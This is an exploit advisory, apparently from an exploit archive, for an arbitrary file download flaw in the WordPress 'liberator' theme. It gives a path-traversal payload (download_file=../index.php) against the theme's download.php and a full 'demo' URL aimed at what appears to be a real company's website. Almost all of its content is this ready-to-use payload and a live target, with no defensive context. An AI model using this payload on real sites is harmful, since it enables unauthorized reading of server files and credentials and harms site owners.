id: 29595
date: 01/21/2018
title: Wordpress liberator theme - Arbitrary file download Vulnerability
author: MrSqar
cves: 

-===================足====================足=================-
# Exploit title : Wordpress liberator theme arbitrary file download
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# Tested on : BackBox linux
# check if site is vulnerabe : /wp-content/themes/liberator/inc/php/download.php
you can download any script from the site by this method 
site.com/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php
# deom site :
https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php
 -===================足====================足=================-

#  0day.today [2023-03-26]  #